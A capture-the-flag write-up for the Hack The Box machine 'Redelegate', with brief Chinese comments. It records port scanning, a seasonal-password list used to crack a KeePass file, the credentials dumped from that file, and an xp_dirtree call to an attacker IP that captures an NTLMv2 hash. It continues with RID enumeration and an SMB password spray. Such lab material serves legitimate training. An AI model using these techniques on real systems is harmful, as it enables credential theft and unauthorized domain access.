Redelegate
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nmap 10.129.130.206 -p 21,53,80,88,135,139,389,445,464,593,636,1433,3268,3269,3389,5985,9389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 09:17 EDT
Nmap scan report for DC.redelegate.vl (10.129.130.206)
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24 01:11AM 434 CyberAudit.txt
| 10-20-24 05:14AM 2622 Shared.kdbx
|_10-20-24 01:26AM 580 TrainingAgenda.txt
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-13 13:17:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.129.130.206:1433:
| Target_Name: REDELEGATE
| NetBIOS_Domain_Name: REDELEGATE
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: redelegate.vl
| DNS_Computer_Name: dc.redelegate.vl
| DNS_Tree_Name: redelegate.vl
|_ Product_Version: 10.0.20348
|_ssl-date: 2025-10-13T13:17:34+00:00; +1s from scanner time.
| ms-sql-info:
| 10.129.130.206:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-13T13:06:14
|_Not valid after: 2055-10-13T13:06:14
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.redelegate.vl
| Not valid before: 2025-10-12T13:03:33
|_Not valid after: 2026-04-13T13:03:33
|_ssl-date: 2025-10-13T13:17:34+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: REDELEGATE
| NetBIOS_Domain_Name: REDELEGATE
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: redelegate.vl
| DNS_Computer_Name: dc.redelegate.vl
| DNS_Tree_Name: redelegate.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-13T13:17:26+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-13T13:17:26
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.75 seconds
1.1.2. ftp
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# ftp 10.129.130.206
Connected to 10.129.130.206.
220 Microsoft FTP Service
Name (10.129.130.206:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
>>>> ftp> binary
200 Type set to I.
ftp> ls -la
229 Entering Extended Passive Mode (|||49753|)
125 Data connection already open; Transfer starting.
10-20-24 01:11AM 434 CyberAudit.txt
10-20-24 05:14AM 2622 Shared.kdbx
10-20-24 01:26AM 580 TrainingAgenda.txt
Warning
ftp下载文件,一定要切换到binary模式,不然windows的FTP文件传输到linux它的换行结尾在linux上是有问题的, 当你切换到binary模式后,会自动处理你下载文件的换行结尾
1.1.3. CyberAudit.txt
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# cat CyberAudit.txt
OCTOBER 2024 AUDIT FINDINGS
[!] CyberSecurity Audit findings:
1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs
[*] Remediation steps:
>>>> 1) Prompt users to change their passwords: DONE #说明用户还可能有弱口令
1) Check privileges for all users and remove high privileges: DONE
>>>> 1) Remove unused objects in the domain: IN PROGRESS #存在未使用的对象
>>>> 2) Recheck ACLs: IN PROGRESS #存在危险ACLs
1.1.4. TrainingAgenda.txt
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# cat TrainingAgenda.txt
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)
Friday 4th October | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one
Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?
Friday 18th October | 11.30 - 13.30 - 7 attendees
>>>> "Weak Passwords" - Why "SeasonYear!" is not a good password
Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them
1.1.5. keepass
尝试用弱口令解密
Autumn2024!
Fall2024!
October2024!
Winter2024!
Spring2024!
Summer2024!
Autumn2023!
Fall2023!
October2023!
Winter2023!
Spring2023!
Summer2023!
September2024!
November2024!
December2024!
Autumn2024!!
Fall2024!!
October2024!!
Autumn24!
Fall24!
October24!
Winter24!
Spring24!
Summer24!
Autumn@2024
Fall@2024
October@2024
Winter@2024
Autumn2024@
Fall2024@
October2024@
Autumn2024#
Fall2024#
October2024#
Winter2024#
Password2024!
Welcome2024!
Redelegate2024!
CyberAudit2024!
Training2024!
Security2024!
January2024!
February2024!
March2024!
April2024!
May2024!
June2024!
July2024!
August2024!
Spring2024!
Summer2024!
Fall2024!
Autumn2024!
Winter2024!
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# cat keepass.hash
Shared:$keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8a988f39baca623dd86beaee651025662e6*e4f9d51a5df3e5f9ca1019cd57e10d60f85f48228da3f3b4cf1ffee940e20e01*18c45dbbf7d365a13d6714059937ebad*a59af7b75908d7bdf68b6fd929d315ae6bfe77262e53c209869a236da830495f*806f9dd2081c364e66a114ce3adeba60b282fc5e5ee6f324114d38de9b4502ca
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# john --wordlist=passwords.txt keepass.hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Fall2024! (Shared)
1g 0:00:00:00 DONE (2025-10-13 10:25) 1.369g/s 43.83p/s 43.83c/s 43.83C/s Autumn2024!..Autumn2024#
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# keepassxc-cli export Shared.kdbx --format csv
Enter password to unlock Shared.kdbx:
KdbxXmlReader::readDatabase: found 1 invalid group reference(s)
"Group","Title","Username","Password","URL","Notes","TOTP","Icon","Last Modified","Created"
"Shared/IT","FTP","FTPUser","SguPZBKdRyxWzvXRWy6U","","Deprecated","","0","2024-10-20T07:56:58Z","2024-10-20T07:56:20Z"
"Shared/IT","FS01 Admin","Administrator","Spdv41gg4BlBgSYIW1gF","","","","0","2024-10-20T07:57:21Z","2024-10-20T07:57:02Z"
"Shared/IT","WEB01","WordPress Panel","cn4KOEgsHqvKXPjEnSD9","","","","0","2024-10-20T08:00:25Z","2024-10-20T07:57:24Z"
"Shared/IT","SQL Guest Access","SQLGuest","zDPBpaF4FywlqIv11vii","","","","0","2024-10-20T08:27:09Z","2024-10-20T08:26:48Z"
"Shared/HelpDesk","KeyFob Combination","","22331144","","","","0","2024-10-20T12:12:32Z","2024-10-20T12:12:09Z"
"Shared/Finance","Timesheet Manager","Timesheet","hMFS4I0Kj8Rcd62vqi5X","","","","0","2024-10-20T12:14:18Z","2024-10-20T12:13:30Z"
"Shared/Finance","Payrol App","Payroll","cVkqz4bCM7kJRSNlgx2G","","","","0","2024-10-20T12:14:11Z","2024-10-20T12:13:50Z"
FTPUser SguPZBKdRyxWzvXRWy6U
Administrator Spdv41gg4BlBgSYIW1gF
WordPress Panel cn4KOEgsHqvKXPjEnSD9
SQLGuest zDPBpaF4FywlqIv11vii
Timesheet hMFS4I0Kj8Rcd62vqi5X
Payroll cVkqz4bCM7kJRSNlgx2G
1.2. msssql
加上 --local-auth 可以认证到mssql
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc mssql DC.redelegate.vl -u users.txt -p pass.txt --no-bruteforce --local-auth
MSSQL 10.129.130.206 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.130.206 1433 DC [-] DC\FTPUser:SguPZBKdRyxWzvXRWy6U (Login failed for user 'FTPUser'. Please try again with or without '--local-auth')
MSSQL 10.129.130.206 1433 DC [-] DC\Administrator:Spdv41gg4BlBgSYIW1gF (Login failed for user 'Administrator'. Please try again with or without '--local-auth')
MSSQL 10.129.130.206 1433 DC [-] DC\WordPress:Panel (Login failed for user 'WordPress'. Please try again with or without '--local-auth')
MSSQL 10.129.130.206 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# impacket-mssqlclient 'SQLGuest:zDPBpaF4FywlqIv11vii@DC.redelegate.vl'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SQLGuest guest@master)>
guest用户没啥卵用
试一下用responder进行捕获hash
xp_dirtree \\10.10.14.58\share
[SMB] NTLMv2-SSP Client : 10.129.130.206
[SMB] NTLMv2-SSP Username : REDELEGATE\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::REDELEGATE:1122334455667788:1EC3154E5A531E2D508A8835036B7B9D:010100000000000000B8D66E2E3CDC019DD02FC697B04AB100000000020008004C0044005A00490001001E00570049004E002D005700540045004800440059004200540037004D00360004003400570049004E002D005700540045004800440059004200540037004D0036002E004C0044005A0049002E004C004F00430041004C00030014004C0044005A0049002E004C004F00430041004C00050014004C0044005A0049002E004C004F00430041004C000700080000B8D66E2E3CDC0106000400020000000800300030000000000000000000000000300000BD7A439ED71715E80F50C232CA65106B5754E633734D5C63062D7CD2A6C0B86D0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00350038000000000000000000
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::REDELEGATE:1122334455667788:1ec3154e5a531e...000000
Time.Started.....: Mon Oct 13 22:45:38 2025 (1 sec)
Time.Estimated...: Mon Oct 13 22:45:39 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 17858.0 kH/s (2.45ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344388/14344388 (100.00%)
Rejected.........: 0/14344388 (0.00%)
Restore.Point....: 14344388/14344388 (100.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 0213ade -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#01.: Temp: 47c Util: 24% Core:1890MHz Mem:8001MHz Bus:8
因为是sqlserver本地账号,所以我也没法制作银票
1.3. RID Cycling
枚举域内用户,然后用密码爆破
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc mssql DC.redelegate.vl -u SQLGuest -p zDPBpaF4FywlqIv11vii --local-auth --rid-brute 9999
MSSQL 10.129.130.206 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.130.206 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
MSSQL 10.129.130.206 1433 DC 498: REDELEGATE\Enterprise Read-only Domain Controllers
MSSQL 10.129.130.206 1433 DC 500: WIN-Q13O908QBPG\Administrator
MSSQL 10.129.130.206 1433 DC 501: REDELEGATE\Guest
MSSQL 10.129.130.206 1433 DC 502: REDELEGATE\krbtgt
MSSQL 10.129.130.206 1433 DC 512: REDELEGATE\Domain Admins
MSSQL 10.129.130.206 1433 DC 513: REDELEGATE\Domain Users
MSSQL 10.129.130.206 1433 DC 514: REDELEGATE\Domain Guests
MSSQL 10.129.130.206 1433 DC 515: REDELEGATE\Domain Computers
MSSQL 10.129.130.206 1433 DC 516: REDELEGATE\Domain Controllers
MSSQL 10.129.130.206 1433 DC 517: REDELEGATE\Cert Publishers
MSSQL 10.129.130.206 1433 DC 518: REDELEGATE\Schema Admins
MSSQL 10.129.130.206 1433 DC 519: REDELEGATE\Enterprise Admins
MSSQL 10.129.130.206 1433 DC 520: REDELEGATE\Group Policy Creator Owners
MSSQL 10.129.130.206 1433 DC 521: REDELEGATE\Read-only Domain Controllers
MSSQL 10.129.130.206 1433 DC 522: REDELEGATE\Cloneable Domain Controllers
MSSQL 10.129.130.206 1433 DC 525: REDELEGATE\Protected Users
MSSQL 10.129.130.206 1433 DC 526: REDELEGATE\Key Admins
MSSQL 10.129.130.206 1433 DC 527: REDELEGATE\Enterprise Key Admins
MSSQL 10.129.130.206 1433 DC 553: REDELEGATE\RAS and IAS Servers
MSSQL 10.129.130.206 1433 DC 571: REDELEGATE\Allowed RODC Password Replication Group
MSSQL 10.129.130.206 1433 DC 572: REDELEGATE\Denied RODC Password Replication Group
MSSQL 10.129.130.206 1433 DC 1000: REDELEGATE\SQLServer2005SQLBrowserUser$WIN-Q13O908QBPG
MSSQL 10.129.130.206 1433 DC 1002: REDELEGATE\DC$
MSSQL 10.129.130.206 1433 DC 1103: REDELEGATE\FS01$
MSSQL 10.129.130.206 1433 DC 1104: REDELEGATE\Christine.Flanders
MSSQL 10.129.130.206 1433 DC 1105: REDELEGATE\Marie.Curie
MSSQL 10.129.130.206 1433 DC 1106: REDELEGATE\Helen.Frost
MSSQL 10.129.130.206 1433 DC 1107: REDELEGATE\Michael.Pontiac
MSSQL 10.129.130.206 1433 DC 1108: REDELEGATE\Mallory.Roberts
MSSQL 10.129.130.206 1433 DC 1109: REDELEGATE\James.Dinkleberg
MSSQL 10.129.130.206 1433 DC 1112: REDELEGATE\Helpdesk
MSSQL 10.129.130.206 1433 DC 1113: REDELEGATE\IT
MSSQL 10.129.130.206 1433 DC 1114: REDELEGATE\Finance
MSSQL 10.129.130.206 1433 DC 1115: REDELEGATE\DnsAdmins
MSSQL 10.129.130.206 1433 DC 1116: REDELEGATE\DnsUpdateProxy
MSSQL 10.129.130.206 1433 DC 1117: REDELEGATE\Ryan.Cooper
MSSQL 10.129.130.206 1433 DC 1119: REDELEGATE\sql_svc
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc smb DC.redelegate.vl -u valid_user.txt -p passwords.txt --continue-on-success
SMB 10.129.130.206 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [+] REDELEGATE\Marie.Curie:Fall2024!
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:Fall2024! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helpdesk:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\IT:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Finance:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsAdmins:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsUpdateProxy:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Ryan.Cooper:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\sql_svc:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:Winter2024! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helpdesk:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\IT:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Finance:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsAdmins:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsUpdateProxy:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Ryan.Cooper:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\sql_svc:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:Spring2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:Spring2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:Spring2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:Spring2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:Spring2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:Spring2024! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:Spring2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helpdesk:Spring2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\IT:Spring2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Finance:Spring2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsAdmins:Spring2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsUpdateProxy:Spring2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Ryan.Cooper:Spring2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\sql_svc:Spring2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:Summer2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:Summer2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:Summer2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:Summer2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:Summer2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:Summer2024! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:Summer2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helpdesk:Summer2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\IT:Summer2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Finance:Summer2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsAdmins:Summer2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsUpdateProxy:Summer2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Ryan.Cooper:Summer2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\sql_svc:Summer2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:SguPZBKdRyxWzvXRWy6U STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helpdesk:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\IT:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Finance:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsAdmins:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsUpdateProxy:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Ryan.Cooper:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\sql_svc:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:Spdv41gg4BlBgSYIW1gF STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helpdesk:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\IT:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Finance:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsAdmins:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsUpdateProxy:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Ryan.Cooper:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\sql_svc:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:Panel STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:Panel STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:Panel STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:Panel STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:Panel STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:Panel STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:Panel STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helpdesk:Panel STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\IT:Panel STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Finance:Panel STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsAdmins:Panel STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsUpdateProxy:Panel STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Ryan.Cooper:Panel STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\sql_svc:Panel STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:zDPBpaF4FywlqIv11vii STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helpdesk:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\IT:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Finance:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsAdmins:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsUpdateProxy:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
